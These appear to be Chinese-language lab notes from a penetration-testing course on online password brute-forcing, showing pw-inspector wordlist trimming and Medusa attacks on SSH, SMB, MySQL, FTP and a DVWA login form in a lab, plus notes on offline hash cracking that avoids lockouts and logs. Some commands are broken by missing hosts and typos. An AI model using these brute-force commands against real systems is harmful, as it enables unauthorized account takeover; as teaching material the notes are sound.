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    - 按长度和字符集筛选字典                    

    - pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l

    - pw-inspector -i /usr/share/wordlists/nmap.lst -o P.lst -u


    - 密码复杂度(字典命中率)              

    - 带宽、协议、服务器性能、客户端性能                        

    - 锁定阈值                                

    - 单位时间最大登陆请求次数

root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l

root@K:~# cat /usr/share/wordlists/nmap.lst

root@K:~# more p.lst

root@K:~# pw-inspector

PW-Inspector v0.2 (c) 2005 by van Hauser / THC vh@thc.org [http://www.thc.org]

Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s


  -i FILE    file to read passwords from (default: stdin)

  -o FILE    file to write valid passwords to (default: stdout)

  -m MINLEN  minimum length of a valid password

  -M MAXLEN  maximum length of a valid password

  -c MINSETS the minimum number of sets required (default: all given)


  -l         lowcase characters (a,b,c,d, etc.)

  -u         upcase characters (A,B,C,D, etc.)

  -n         numbers (1,2,3,4, etc.)

  -p         printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)

  -s         special characters - all others not withint the sets above

PW-Inspector reads passwords in and prints those which meet the requirements.

The return code is the number of valid passwords found, 0 if none was found.

Use for security: check passwords, if 0 is returned, reject password choice.

Use for hacking: trim your dictionary file to the pw requirements of the target.

Usage only allowed for legal purposes.

root@K:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o p.lst -l -m 3 -M 5

root@K:~# more p.lst



    - 稳定性差,程序时常崩溃                  

    - 速度控制不好,容易触发服务屏蔽或锁死机制

    - 每主机新建进程,每服务新建实例          

    - 大量目标破解时性能差                    


    - 稳定性好                                

    - 速度控制得当                            

    - 基于线程                                

    - 支持模块少于hydra(不支持RDP )         

    - WEB-Form支持存在缺陷

root@k:~# medusa -h

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

medusa: option requires an argument -- 'h'

CRITICAL: Unknown error processing command-line options.

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]

  -h [TEXT]    : Target hostname or IP address

  -H [FILE]    : File containing target hostnames or IP addresses

  -u [TEXT]    : Username to test

  -U [FILE]    : File containing usernames to test

  -p [TEXT]    : Password to test

  -P [FILE]    : File containing passwords to test

  -C [FILE]    : File containing combo entries. See README for more information.

  -O [FILE]    : File to append log information to

  -e [n/s/ns]  : Additional password checks ([n] No Password, [s] Password = Username)

  -M [TEXT]    : Name of the module to execute (without the .mod extension)

  -m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a

                 different parameter each time and they will all be sent to the module (i.e.

                 -m Param1 -m Param2, etc.)

  -d           : Dump all known modules

  -n [NUM]     : Use for non-default TCP port number

  -s           : Enable SSL

  -g [NUM]     : Give up after trying to connect for NUM seconds (default 3)

  -r [NUM]     : Sleep NUM seconds between retry attempts (default 3)

  -R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.

  -c [NUM]     : Time to wait in usec to verify socket is available (default 500 usec).

  -t [NUM]     : Total number of logins to be tested concurrently

  -T [NUM]     : Total number of hosts to be tested concurrently

  -L           : Parallelize logins using one username per thread. The default is to process 

                 the entire username before proceeding.

  -f           : Stop scanning host after first valid username/password found.

  -F           : Stop audit after first valid username/password found on any host.

  -b           : Suppress startup banner

  -q           : Display module's usage information

  -v [NUM]     : Verbose level [0 - 6 (more)]

  -w [NUM]     : Error debug level [0 - 10 (more)]

  -V           : Display version

  -Z [TEXT]    : Resume scan based on map of previous scan

oot@k:~# medusa -d

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

  Available modules in "." :

  Available modules in "/usr/lib/medusa/modules" :

    + cvs.mod : Brute force module for CVS sessions : version 2.0

    + ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1

    + http.mod : Brute force module for HTTP : version 2.1

    + imap.mod : Brute force module for IMAP sessions : version 2.0

    + mssql.mod : Brute force module for M$-SQL sessions : version 2.0

    + mysql.mod : Brute force module for MySQL sessions : version 2.0

    + nntp.mod : Brute force module for NNTP sessions : version 2.0

    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0

    + pop3.mod : Brute force module for POP3 sessions : version 2.0

    + postgres.mod : Brute force module for PostgreSQL sessions : version 2.0

    + rexec.mod : Brute force module for REXEC sessions : version 2.0

    + rlogin.mod : Brute force module for RLOGIN sessions : version 2.0

    + rsh.mod : Brute force module for RSH sessions : version 2.0

    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.1

    + smtp-vrfy.mod : Brute force module for verifying SMTP accounts (VRFY/EXPN/RCPT TO) : version 2.1

    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0

    + snmp.mod : Brute force module for SNMP Community Strings : version 2.1

    + svn.mod : Brute force module for Subversion sessions : version 2.1

    + telnet.mod : Brute force module for telnet sessions : version 2.0

    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0

    + vnc.mod : Brute force module for VNC sessions : version 2.1

    + web-form.mod : Brute force module for web forms : version 2.1

    + wrapper.mod : Generic Wrapper Module : version 2.0


medusa -d                                                


    - medusa -M smbnt -h -u administrator -P pass.lst -e ns -F

破解Linux SSH密码                                    

    - medusa -M ssh -h -u root -P pass.lst -e ns -F     


    - medusa -M mysql -h -u root -P pass.lst -e ns -F         

    - medusa -h -u admin -P pass.lst -M web-form -m           

      FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-       


msfadmin@metasploitable:~$ sudo passwd root

[sudo] password for msfadmin:

Enter new UNIX password:

Retype new UNIX password:

No password supplied

Enter new UNIX password:

Retype new UNIX password:

passwd: password updated successfully

root@K:~# medusa -M ssh -h -e ns -F -u root -P /usr/share/wordlists/nmap.lst

root@K:~# grep 1234 /usr/share/wordlists/nmap.lst

root@K:~# grep ^1234% /usr/share/wordlists/nmap.lst

root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v #

root@K:~# cat /usr/share/wordlists/nmap.lst | grep -v # > pass.lst

root@K:~# medusa -M ssh -h -e ns -f -u root -P pass.lst

XP IP地址是192.168.1.118

C:\net user administrator zipper

root@K:~# medusa -M mebnt -h -u administrator -P pass.lst -e ns -f

root@K:~# nmap P3306

Starting Nmap 7.12 ( https://nmap.org ) at 2016-04-21 23:00 CST

Nmap scan report for

Host is up (10.00036s latency).


3306/tcp  open  mysql

MAC Address: 08:00:27:B0:3A:76 (Oracle Virtualbox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.20 seconds

root@K:~# medusa -M mysql -h -e ns -F -u root -P pass.lst

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [mysql] Host: (1 of 1, O complete) User: root (1 of 5000 complete) Password: (1 of  5000 complete)

ACCOUNT CHECK: [mysql] Host: User: root Password:  [SUCCESS]

root@K:~# medusa -M ftp -h -e ns -F -u ftp -P pass.lst

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [mysql] Host: (1 of 1, O complete) User: root (1 of 5000 complete) Password: (1 of  5000 complete)

ACCOUNT CHECK: [mysql] Host: User: root Password:  [SUCCESS]

root@K:~# medusa -M ftp -h -e ns -F -u ftp -P pass.lst -n 2121

root@K:~# medusa -h -u admin -P pass.lst -M web-form -m FORM:"dvwa/login.php" -m DENY-SIGNAL:"login.php" -m FORM-DATA:"post?user=username&pas=password&Login=Login"

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ERROR: The answer was NOT successfully received, understood, and accepted while trying admin 123456: error code  302

ACCOUNT XGWXK: [web-form] Host: (1 of, 0 complete) User: admin (1 of 1, 0 complete) Password: 123456 (1 of 4998 complete)

root@K:~# medusa -M web-form -q

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

web-form.mod (2.1) Luciano Bello <luciano@linux.org.ar> :: Brute force module for web forms

Available module options:

  USER-AGENT:?       User-agent value. Default: "I'm not Mozilla, I'm Ming Mong".

  FORM:?             Target form to request. Default: "/"

  DENY-SIGNAL:?      Authentication failure message. Attempt flagged as successful if text is not present in

                     server response. Default: "Login incorrect"

  CUSTOM-HEADER:?    Custom HTTP header.

                     More headers can be defined by using this option several times.


                     Methods and fields to send to web service. Valid methods are GET and POST. The actual form

                     data to be submitted should also be defined here. Specifically, the fields: username and

                     password. The username field must be the first, followed by the password field.

                     Default: "post?username=&password="

Usage example: "-M web-form -m USER-AGENT:"g3rg3 gerg" -m FORM:"webmail/index.php" -m DENY-SIGNAL:"deny!"

                 -m FORM-DATA:"post?user=&pass=&submit=True" -m CUSTOM-HEADER:"Cookie: name=value"


    - -n : 非默认端口   

    - -s : 使用SSL连接  

    - -T : 并发主机数   

medusa -M ftp -q

root@k:~# medusa -M ftp -q

Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ftp.mod (2.1) pMonkey <pmonkey@foofus.net> :: Brute force module for FTP/FTPS sessions

Available module options:


  EXPLICIT: AUTH TLS Mode as defined in RFC 4217

     Explicit FTPS (FTP/SSL) connects to a FTP service in the clear. Prior to

     sending any credentials, however, an "AUTH TLS" command is issued and a

     SSL session is negotiated.

  IMPLICIT: FTP over SSL (990/tcp)

     Implicit FTPS requires a SSL handshake to be performed before any FTP

     commands are sent. This service typically resides on tcp/990. If the user

     specifies this option or uses the "-n" (SSL) option, the module will

     default to this mode and tcp/990.


     The default behaviour if no MODE is specified. Authentication is attempted

     in the clear. If the server requests encryption for the given user,

     Explicit FTPS is utilized.

Example Usage:

    medusa -M ftp -h host -u username -p password

    medusa -M ftp -s -h host -u username -p password

    medusa -M ftp -m MODE:EXPLICIT -h host -u username -p password

(*) Default value



    - 禁止明文传输密码                                                

    - 每次认证使用HASH算法加密密码传输)(HASH算法加密容易、解密困难)

    - 服务器端用户数据库应加盐加密保存                                


    - 嗅探获取密码HASH                                                

    - 利用漏洞登录服务器并从用户数据库获取密码HASH                    

    - 识别HASH类型                    


    - 利用李璇破解工具碰撞密码HASH



    - 离线不会触发密码锁定机制              

    - 不会产生大量登录失败日志引起管理员注意


    - hash-identifier                       

    - Hashid                                

    - 可能识别错误或无法识别



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